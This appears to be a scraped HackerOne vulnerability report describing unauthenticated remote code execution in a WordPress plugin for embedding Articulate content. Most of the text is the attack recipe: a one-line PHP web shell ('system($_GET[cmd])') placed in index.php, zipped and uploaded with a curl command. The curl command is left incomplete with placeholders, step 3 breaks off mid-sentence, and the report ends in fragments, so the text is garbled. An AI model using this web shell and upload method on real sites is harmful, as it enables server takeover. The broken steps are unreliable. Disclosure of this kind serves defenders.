Nextcloud: WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution (UNAUTHORIZED)

ID H1:696198
Type hackerone
Reporter j4tayu
Modified 2019-11-11T15:23:26


because in the burp suite, the build request is complicated, I only use curl 1. Create file index.html and index.php

Index.html : <html> Hello world </html>

Index.php : <?php system($_GET[cmd]); ?>

  1. Once created enter into .zip (COMPRESS)
  2. LETS UPLOAD CURL : curl -F "name={NAMAFILE}" -F "chunk={RANDOM}" -F "chunks={RANDOM}" -F ""
  3. OK HERE, THERE IS A READING UPLOAD COMPLETE which means success we try access to <PATH = PATH AT RESULT EX:

For the autoxploiter


Remote code execution